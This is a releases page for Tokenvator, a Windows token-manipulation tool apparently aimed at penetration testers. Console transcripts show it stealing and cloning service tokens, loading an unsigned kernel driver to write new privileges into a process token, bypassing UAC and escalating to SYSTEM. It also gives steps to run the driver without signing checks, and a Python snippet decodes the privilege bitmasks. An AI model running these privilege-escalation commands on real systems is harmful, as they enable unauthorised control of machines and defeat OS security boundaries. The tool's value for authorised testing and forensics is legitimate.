Releases: 0xbadjuju/Tokenvator
Added Clone_Token
C:\>Tokenvator.exe Clone_Token /Process:3824 /Command:cmd.exe
(Tokens) >
Option Value
------ -----
process 3824
command cmd.exe
[+] 3824 sqlservr
[*] Command: cmd.exe
[*] Arguments:
[*] If the above doesn't look correct you may need quotes
[+] SeCreateTokenPrivilege is present and enabled on the token
[-] SeSecurityPrivilege is not enabled on the token
[*] Enabling SeSecurityPrivilege on the token
[*] Adjusting Token Privilege SeSecurityPrivilege => SE_PRIVILEGE_ENABLED
[+] Recieved luid
[*] AdjustTokenPrivilege
[+] Adjusted Privilege: SeSecurityPrivilege
[+] Privilege State: SE_PRIVILEGE_ENABLED
_SECURITY_QUALITY_OF_SERVICE
_OBJECT_ATTRIBUTES
[*] Recieved Process Handle 0x02E4
[*] Recieved Token Handle 0x02E8
[+] Source: Advapi
[+] User:
S-1-5-80-3880718306-3832830129-1677859214-2598158968-1052248003 NT SERVICE\MSSQLSERVER
[+] Enumerated 12 Groups:
S-1-16-12288 Some or all identity references could not be translated.
S-1-1-0 Everyone
S-1-5-21-258464558-1780981397-2849438727-1005 DESKTOP-J5KC1AR\PdwComputeNodeAccess
S-1-5-32-558 BUILTIN\Performance Monitor Users
S-1-5-32-545 BUILTIN\Users
S-1-5-6 NT AUTHORITY\SERVICE
S-1-2-1 CONSOLE LOGON
S-1-5-11 NT AUTHORITY\Authenticated Users
S-1-5-15 NT AUTHORITY\This Organization
S-1-5-5-0-217494 Some or all identity references could not be translated.
S-1-2-0 LOCAL
S-1-5-80-0 NT SERVICE\ALL SERVICES
[*] Enumerating Token Privileges
[*] GetTokenInformation (TokenPrivileges) - Pass 1
[*] GetTokenInformation - Pass 2
[+] Enumerated 9 Privileges
Privilege Name Enabled
-------------- -------
SeAssignPrimaryTokenPrivilege False
SeIncreaseQuotaPrivilege False
SeShutdownPrivilege False
SeChangeNotifyPrivilege True
SeUndockPrivilege False
SeImpersonatePrivilege True
SeCreateGlobalPrivilege True
SeIncreaseWorkingSetPrivilege False
SeTimeZonePrivilege False
[+] Owner:
S-1-5-80-3880718306-3832830129-1677859214-2598158968-1052248003 NT SERVICE\MSSQLSERVER
[+] Primary Group:
S-1-5-80-3880718306-3832830129-1677859214-2598158968-1052248003 NT SERVICE\MSSQLSERVER
[+] ACL Count: 659
[*] Updating Desktop DACL
[+] hDesktop : 0x02F0
[+] Recieved DACL : 0x293CC0284C4
[+] Create Everyone Sid - Pass 1 : 0x000C
[+] Create Everyone Sid - Pass 2 : 0x293CC03F530
[+] Added Everyone to DACL : 0x293CC03A0B0
[+] Applied DACL to Object
[+] hWinSta0 : 0x0318
[+] Recieved DACL : 0x293CC04B8B4
[+] Create Everyone Sid - Pass 1 : 0x000C
[+] Create Everyone Sid - Pass 2 : 0x293CC03F610
[+] Added Everyone to DACL : 0x293CC053400
[+] Applied DACL to Object
[*] CreateProcessWithTokenW
[+] Created process: 7140
[+] Created thread: 11228
Like Create_Token, Clone_Token requires SeCreateTokenPrivilege.
Release 3
See the NetSPI blog for full details:
https://www.netspi.com/blog/technical/network-penetration-testing/tokenvator-release-3/
(Tokens) > Install_Driver /ServiceName:TokenDriver /Path:C:\Share\KernelTokens.sys
Option Value
------ -----
servicename TokenDriver
path C:\Share\KernelTokens.sys
[*] Service Name: TokenDriver
[*] Service Path: C:\Share\KernelTokens.sys
[*] Using Service Name TokenDriver
[*] Connecting to .
[+] Connected to .
[*] Full Path: C:\Share\KernelTokens.sys
[+] Opened service
[+] Started Service
(Tokens) > Add_Privilege /Process:notepad /Privilege:SeCreateTokenPrivilege
Option Value
------ -----
process notepad
privilege SeCreateTokenPrivilege
[+] 8568 notepad
[+] Connected to Driver
[*] Sending IOCTL 2285592
[+] 72 Bytes Returned
[+] PEPROCESS Base Address : 0xFFFFBC0F8A59F080
[+] EX_FAST_REF Base Address : 0xFFFFBC0F8A59F538
[+] EX_FAST_REF Data : 0xFFFF95027C1ED063
[+] TOKEN Base Address : 0xFFFF95027C1ED060
[+] PSEP_TOKEN_PRIVILEGES Base Address : 0xFFFF95027C1ED0A0
[+] Current Present Value : 0x602880000
[+] Updated Present Value : 0x602880004
[+] Enabled : 0x800000
[+] EnabledByDefault : 0x40800000
[*] Disconnected from Driver
(Tokens) > List_Privileges /Process:Notepad
Option Value
------ -----
process Notepad
[+] 8568 Notepad
Remote: True
Impers: False
[*] Recieved Process Handle 0x02C4
[*] Recieved Token Handle 0x02C8
[*] Enumerating Token Privileges
[*] GetTokenInformation (TokenPrivileges) - Pass 1
[*] GetTokenInformation - Pass 2
[+] Enumerated 6 Privileges
Privilege Name Enabled
-------------- -------
SeCreateTokenPrivilege False
SeShutdownPrivilege False
SeChangeNotifyPrivilege True
SeUndockPrivilege False
SeIncreaseWorkingSetPrivilege False
SeTimeZonePrivilege False
(Tokens) > Add_Privilege /Process:notepad /Privilege:SeDebugPrivilege
Option Value
------ -----
process notepad
privilege SeDebugPrivilege
[+] 8568 notepad
[+] Connected to Driver
[*] Sending IOCTL 2285592
[+] 72 Bytes Returned
[+] PEPROCESS Base Address : 0xFFFFBC0F8A59F080
[+] EX_FAST_REF Base Address : 0xFFFFBC0F8A59F538
[+] EX_FAST_REF Data : 0xFFFF95027C1ED062
[+] TOKEN Base Address : 0xFFFF95027C1ED060
[+] PSEP_TOKEN_PRIVILEGES Base Address : 0xFFFF95027C1ED0A0
[+] Current Present Value : 0x602880004
[+] Updated Present Value : 0x602980004
[+] Enabled : 0x800000
[+] EnabledByDefault : 0x40800000
[*] Disconnected from Driver
(Tokens) > List_Privileges /Process:Notepad
Option Value
------ -----
process Notepad
[+] 8568 Notepad
Remote: True
Impers: False
[*] Recieved Process Handle 0x02C8
[*] Recieved Token Handle 0x02CC
[*] Enumerating Token Privileges
[*] GetTokenInformation (TokenPrivileges) - Pass 1
[*] GetTokenInformation - Pass 2
[+] Enumerated 7 Privileges
Privilege Name Enabled
-------------- -------
SeCreateTokenPrivilege False
SeShutdownPrivilege False
SeDebugPrivilege False
SeChangeNotifyPrivilege True
SeUndockPrivilege False
SeIncreaseWorkingSetPrivilege False
SeTimeZonePrivilege False
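Decoding the Present, Enabled and EnabledByDefault values printed by Add_Privilege above, as an added example that is not Tokenvator's own code: each bit index in a _SEP_TOKEN_PRIVILEGES mask is the well-known LUID of a privilege, so the two "Updated Present Value" lines correspond to setting bit 2 (SeCreateTokenPrivilege) and bit 20 (SeDebugPrivilege). The LUID table is the standard Windows privilege table; the sample masks are copied from the transcript.

```python
# Added example, not Tokenvator's own code: decode the _SEP_TOKEN_PRIVILEGES
# bitmasks that Add_Privilege prints. Each 64-bit mask (Present, Enabled,
# EnabledByDefault) uses bit N for the privilege whose well-known LUID is N.
# Handy when reviewing a memory image: Present normally only shrinks after
# token creation, so a bit that appears later points at a kernel-memory edit.

PRIVILEGE_LUIDS = {
    2: "SeCreateTokenPrivilege", 3: "SeAssignPrimaryTokenPrivilege",
    4: "SeLockMemoryPrivilege", 5: "SeIncreaseQuotaPrivilege",
    6: "SeMachineAccountPrivilege", 7: "SeTcbPrivilege",
    8: "SeSecurityPrivilege", 9: "SeTakeOwnershipPrivilege",
    10: "SeLoadDriverPrivilege", 11: "SeSystemProfilePrivilege",
    12: "SeSystemtimePrivilege", 13: "SeProfileSingleProcessPrivilege",
    14: "SeIncreaseBasePriorityPrivilege", 15: "SeCreatePagefilePrivilege",
    16: "SeCreatePermanentPrivilege", 17: "SeBackupPrivilege",
    18: "SeRestorePrivilege", 19: "SeShutdownPrivilege",
    20: "SeDebugPrivilege", 21: "SeAuditPrivilege",
    22: "SeSystemEnvironmentPrivilege", 23: "SeChangeNotifyPrivilege",
    24: "SeRemoteShutdownPrivilege", 25: "SeUndockPrivilege",
    26: "SeSyncAgentPrivilege", 27: "SeEnableDelegationPrivilege",
    28: "SeManageVolumePrivilege", 29: "SeImpersonatePrivilege",
    30: "SeCreateGlobalPrivilege", 31: "SeTrustedCredManAccessPrivilege",
    32: "SeRelabelPrivilege", 33: "SeIncreaseWorkingSetPrivilege",
    34: "SeTimeZonePrivilege", 35: "SeCreateSymbolicLinkPrivilege",
    36: "SeDelegateSessionUserImpersonatePrivilege",
}

def decode_mask(mask):
    """Privilege names for every set bit, lowest LUID first."""
    return [PRIVILEGE_LUIDS.get(b, f"UnknownLuid{b}")
            for b in range(64) if mask >> b & 1]

def diff_masks(before, after):
    """(added, removed) privilege names between two values of the same field."""
    return decode_mask(after & ~before), decode_mask(before & ~after)

# Values copied from the Add_Privilege transcript above (notepad, PID 8568).
BASELINE = 0x602880000            # Current Present Value before the first edit
AFTER_CREATE_TOKEN = 0x602880004  # Updated Present Value, first edit
AFTER_DEBUG = 0x602980004         # Updated Present Value, second edit

if __name__ == "__main__":
    print("baseline:", decode_mask(BASELINE))
    print("1st edit:", diff_masks(BASELINE, AFTER_CREATE_TOKEN))
    print("2nd edit:", diff_masks(AFTER_CREATE_TOKEN, AFTER_DEBUG))
    print("enabled :", decode_mask(0x800000), decode_mask(0x40800000))
```

The decoded baseline matches the List_Privileges output above exactly, and diffing the two Present values isolates the single privilege each driver call inserted.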
Note: The KernelToken.sys driver is compiled and attached, but it is not signed.
If you want to test it without signing it, run the command bcdedit /debug on
and restart.
Note: This release is for .Net 4.5 x64
Release 2 Update 2 Beta
Update to add support for interactive sub-processes
(Tokens) > run cmd.exe
[+] Starting cmd.exe
[*] Note: The prompt is currently missing for input
Microsoft Windows [Version 10.0.17763.379]
(c) 2018 Microsoft Corporation. All rights reserved.
whoami
C:\Tokenvator\Tokenvator\bin\Release-Net45>whoami
windows10pro\0xbadjuju
dir
C:\Tokenvator\Tokenvator\bin\Release-Net45>dir
Volume in drive C has no label.
Volume Serial Number is A624-B8DD
Directory of C:\Tokenvator\Tokenvator\bin\Release-Net45
03/22/2019 11:38 AM <DIR> .
03/22/2019 11:38 AM <DIR> ..
09/15/2018 02:29 AM 3,010,560 System.Management.Automation.dll
02/21/2019 11:45 AM 161 Tokenvator.exe.config
03/22/2019 11:28 AM 112,128 Tokenvator.pdb
03/22/2019 11:28 AM 117,760 Tokenvator.exe
4 File(s) 3,240,609 bytes
2 Dir(s) 84,676,734,976 bytes free
exit
C:\Tokenvator\Tokenvator\bin\Release-Net45>exit
(Tokens) > run powershell.exe
[+] Starting powershell.exe
[*] Note: The prompt is currently missing for input
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
gci
PS C:\Tokenvator\Tokenvator\bin\Release-Net45> gci
Directory: C:\Tokenvator\Tokenvator\bin\Release-Net45
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/15/2018 2:29 AM 3010560 System.Management.Automation.dll
-a---- 2/21/2019 10:45 AM 161 Tokenvator.exe.config
-a---- 3/22/2019 11:28 AM 112128 Tokenvator.pdb
-a---- 3/22/2019 11:28 AM 117760 Tokenvator.exe
exit
PS C:\Tokenvator\Tokenvator\bin\Release-Net45> exit
Release 2 Update 1
Adds support for semi-interactive consoles such as Metasploit's channelized IO and PsExec.
Release 2
Bug Fix Testing Release 1
Potential fix for the request by 0xhexmex that bypassuac accept command-line arguments
Potential fix for Backspace triggering System.ArgumentOutOfRangeException
Blog Release
Usability Improvements
- Left and Right Arrow Keys, Delete Key, and mid-sentence insertions now work as expected
- Up and Down Arrow Keys traverse the scroll-back history as expected
- Search path for executables now works outside of the System32 folder (Yay! PowerShell)
- Relative paths now work for executables
v1.2.0
Run multiple commands as arguments
- tokenvator.exe whoami; getsystem; whoami
Added tab complete to interactive mode
Add token privilege to remote process
- Set_Privilege 2583 SeSecurityPrivilege
Under the hood fixes:
- Added extra checks to ensure primary tokens are returned during automated checks
- Added ability to differentiate between SYSTEM and Network Service when the machine account name is returned as the user
Bug Fixes:
- Fixed GetSystem and GetTrustedInstaller failing due to searching for the wrong name
- Fixed BypassUAC on Windows 10
Errata
- Multiple components fail on .NET 4.6, likely due to IntPtr size
v1.1.0
Multiple enhancements have been made.
It is now possible to selectively alter the token privileges of the current process.
- list_privileges
- set_privilege SeSecurityPrivilege
Tokens can now be taken from processes by the executable name instead of just the Process ID.
- steal_token calc.exe
Processes can now be searched for by a particular user.
- find_user_processes domain\user
Added whoami and reverttoself.
Added automated bypassuac, which finds target-eligible processes based upon integrity level and user.
- bypassuac cmd.exe
Added listing interactive user sessions
- list_user_sessions
Processes are now primarily enumerated via native APIs instead of WMI; however, the WMI features are still available as a backup.